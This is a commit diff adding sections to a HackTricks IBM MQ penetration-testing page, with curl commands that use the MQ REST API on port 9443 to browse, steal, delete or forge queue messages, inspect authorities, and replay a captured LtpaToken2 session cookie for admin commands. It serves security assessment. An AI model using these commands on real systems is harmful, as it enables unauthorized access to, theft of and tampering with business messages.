Merge pull request #2131 from HackTricks-wiki/research_update_src_network-services-pentesting_1414-pentesting-ibmmq_20260415_031959

carlospolop · web-flow · commit 9e01ca98e845 · 2026-04-15T05:26:38.000+02:00
Research Update Enhanced src/network-services-pentesting/141...
diff --git a/src/network-services-pentesting/1414-pentesting-ibmmq.md b/src/network-services-pentesting/1414-pentesting-ibmmq.md
@@ -70,6 +70,14 @@ You can try to enumerate the **queue manager name, the users, the channels and t
 
 If TCP/1414 is filtered or the target only exposes the embedded web server, check **TCP/9443** too. Recent IBM MQ versions expose the **IBM MQ Console / REST API** there by default when `mqweb` is enabled, and the administrative REST endpoint can execute arbitrary **MQSC** commands if you have valid credentials.
 
+Do not limit yourself to the administrative REST API. IBM also exposes a **messaging REST API** on the same listener, so valid `mqweb` credentials can be enough to:
+
+- **browse** messages from a queue with `GET /ibmmq/rest/v3/messaging/qmgr/<qmgr>/queue/<queue>/message`
+- **destructively get** messages with `DELETE /ibmmq/rest/v3/messaging/qmgr/<qmgr>/queue/<queue>/message`
+- **put** attacker-controlled messages with `POST /ibmmq/rest/v3/messaging/qmgr/<qmgr>/queue/<queue>/message`
+
+That matters in real environments where **1414** is ACL-restricted but the web console on **9443** is reachable from jump hosts, VPN ranges, or Kubernetes ingress.
+
 ### Queue Manager
 
 Sometimes, there is no protection against getting the Queue Manager name:
@@ -180,6 +188,43 @@ curl -sku 'admin:passw0rd' \
 
 If you have enough rights to use PCF remotely, IBM exposes `MQCMD_INQUIRE_CHLAUTH_RECS`, which returns the channel authentication records and their mappings to `MCAUSER`. That is useful to confirm whether a channel maps remote users to a more privileged local account before trying message access, object creation, or service abuse.
 
+### Effective authorities
+
+Once you have a working identity, spend a minute checking **what that principal can really do** before assuming a failed PCF request means "wrong credentials". IBM documents three complementary ways to inspect OAM permissions:
+
+- `DISPLAY AUTHREC` over MQSC
+- `dspmqaut` on the host
+- `MQCMD_INQUIRE_ENTITY_AUTH` over PCF
+
+The practical offensive value is high because many remote-admin actions depend on a small set of system objects. For example, PCF administration usually needs the ability to put a command onto `SYSTEM.ADMIN.COMMAND.QUEUE` and to create/read the dynamic reply queue derived from `SYSTEM.DEFAULT.MODEL.QUEUE`.
+
+With MQSC access:
+
+```bash
+echo "DISPLAY AUTHREC PROFILE(SYSTEM.ADMIN.COMMAND.QUEUE) OBJTYPE(QUEUE) PRINCIPAL('app')" \
+  | runmqsc MYQUEUEMGR
+
+echo "DISPLAY AUTHREC PROFILE(SYSTEM.DEFAULT.MODEL.QUEUE) OBJTYPE(QUEUE) PRINCIPAL('app')" \
+  | runmqsc MYQUEUEMGR
+```
+
+Via the REST admin endpoint:
+
+```bash
+curl -sku 'admin:passw0rd' \
+  -H 'ibm-mq-rest-csrf-token: anything' \
+  -H 'Content-Type: text/plain;charset=utf-8' \
+  --data "DISPLAY AUTHREC PROFILE(SYSTEM.ADMIN.COMMAND.QUEUE) OBJTYPE(QUEUE) PRINCIPAL('app')" \
+  https://TARGET:9443/ibmmq/rest/v3/admin/action/qmgr/MYQUEUEMGR/mqsc
+```
+
+If you later obtain shell access on the MQ host, `dspmqaut` gives the same answer without going through MQSC:
+
+```bash
+dspmqaut -m MYQUEUEMGR -t queue -n SYSTEM.ADMIN.COMMAND.QUEUE -p app
+dspmqaut -m MYQUEUEMGR -t queue -n SYSTEM.DEFAULT.MODEL.QUEUE -p app
+```
+
 ### Queues
 
 There is a code snippet with **pymqi** (`dis_queues.py`) but **punch-q** permits to retrieve more pieces of info about the queues:
@@ -222,6 +267,43 @@ You can target queue(s)/channel(s) to sniff out / dump messages from them (non-d
 
 **Do not hesitate to iterate on all identified queues.**
 
+### Dump / put messages through `9443`
+
+If you only have access to the embedded web server, the **messaging REST API** can still be enough to browse, steal, replay, or delete business messages without touching the MQ client port.
+
+Browse the next message non-destructively:
+
+```bash
+curl -sku 'app:passw0rd' \
+  https://TARGET:9443/ibmmq/rest/v3/messaging/qmgr/MYQUEUEMGR/queue/DEV.QUEUE.1/message
+```
+
+Destructively get the next message:
+
+```bash
+curl -sku 'app:passw0rd' \
+  -X DELETE \
+  -H 'ibm-mq-rest-csrf-token: anything' \
+  https://TARGET:9443/ibmmq/rest/v3/messaging/qmgr/MYQUEUEMGR/queue/DEV.QUEUE.1/message
+```
+
+Inject a forged message:
+
+```bash
+curl -sku 'app:passw0rd' \
+  -X POST \
+  -H 'ibm-mq-rest-csrf-token: anything' \
+  -H 'Content-Type: text/plain;charset=utf-8' \
+  --data 'hacktricks-test' \
+  https://TARGET:9443/ibmmq/rest/v3/messaging/qmgr/MYQUEUEMGR/queue/DEV.QUEUE.1/message
+```
+
+This is useful when:
+
+- `1414` is not reachable from your workstation
+- the environment routes the MQ Console through a reverse proxy or ingress controller
+- you want to validate **message tampering** separately from **administrative** rights
+
 ### Code execution
 
 > Some details before continuing: IBM MQ can be controlled though multiple ways: MQSC, PCF, Control Command. Some general lists can be found in [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).  
@@ -301,6 +383,21 @@ This is especially useful during assessments where:
 - The target team manages IBM MQ mainly through the web console and has forgotten to harden the REST roles
 - You want to avoid installing IBM MQ client libraries locally and only need MQSC-level administration
 
+If the environment uses **token-based** authentication instead of HTTP Basic, IBM's `mqweb` login endpoint returns an **`LtpaToken2`** cookie that can be replayed on later requests until it expires (120 minutes by default). That means a stolen browser session or cookie jar can be enough for both message access and admin actions on `9443`.
+
+```bash
+curl -sk -c /tmp/mq.cookies \
+  -H 'Content-Type: application/json' \
+  --data '{"username":"admin","password":"passw0rd"}' \
+  https://TARGET:9443/ibmmq/rest/v3/login
+
+curl -sk -b /tmp/mq.cookies \
+  -H 'ibm-mq-rest-csrf-token: anything' \
+  -H 'Content-Type: text/plain;charset=utf-8' \
+  --data "DISPLAY QMGR ALL" \
+  https://TARGET:9443/ibmmq/rest/v3/admin/action/qmgr/MYQUEUEMGR/mqsc
+```
+
 **Example 2**
 
 For easy reverse shell, **punch-q** proposes also two reverse shell payloads :
@@ -438,6 +535,8 @@ CONTAINER ID   IMAGE                                COMMAND                  CRE
 - [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
 - [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)
 - [IBM MQ REST API: `/admin/action/qmgr/{qmgrName}/mqsc`](https://www.ibm.com/docs/en/ibm-mq/9.4.x?topic=resources-adminactionqmgrqmgrnamemqsc)
+- [IBM MQ messaging REST API](https://www.ibm.com/docs/en/ibm-mq/9.4.x?topic=mq-messaging-using-rest-api)
+- [IBM MQ token-based authentication for the REST API](https://www.ibm.com/docs/en/ibm-mq/9.4.x?topic=security-using-token-based-authentication-rest-api)
 - [IBM MQ container default developer configuration](https://github.com/ibm-messaging/mq-container/blob/master/docs/developer-config.md)
 
 
